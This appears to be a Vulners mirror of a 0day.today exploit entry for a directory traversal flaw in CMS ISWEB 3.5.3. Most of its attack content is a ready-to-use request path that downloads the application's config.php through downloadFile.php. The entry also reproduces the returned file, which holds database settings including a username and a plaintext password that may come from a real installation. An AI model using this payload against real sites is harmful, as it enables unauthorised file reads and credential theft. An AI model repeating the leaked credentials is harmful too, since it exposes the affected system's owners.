Lucene search
K

CMS ISWEB 3.5.3 - Directory Traversal Vulnerability

🗓️ 06 Aug 2018 00:00:00Reported by Thiago SenaType 
zdt
 zdt
🔗 0day.today👁 30 Views

CMS ISWEB 3.5.3 Directory Traversal Vulnerability allows unauthorized file download

Code
# Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal
# Exploit Author: Thiago "thxsena" Sena
# Vendor Homepage: http://www.isweb.it
# Version: 3.5.3
# Tested on: Linux
# CVE : N/A
 
# PoC:
# CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download,
# as demonstrated by
 
moduli/downloadFile.php?file=oggetto_documenti/../.././inc/config.php
 
# Download and open it.
$dati_db = array(
    'tipo' => 'mysql',
    'host' => 'localhost',
    'user' => 'networkis',
    'password' => 'guybrush77',
    'database' => 'networkis',
    'database_offline' => '',
    'persistenza' => FALSE,
    'prefisso' => '',
    'like' => 'LIKE'
);

#  0day.today [2018-08-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation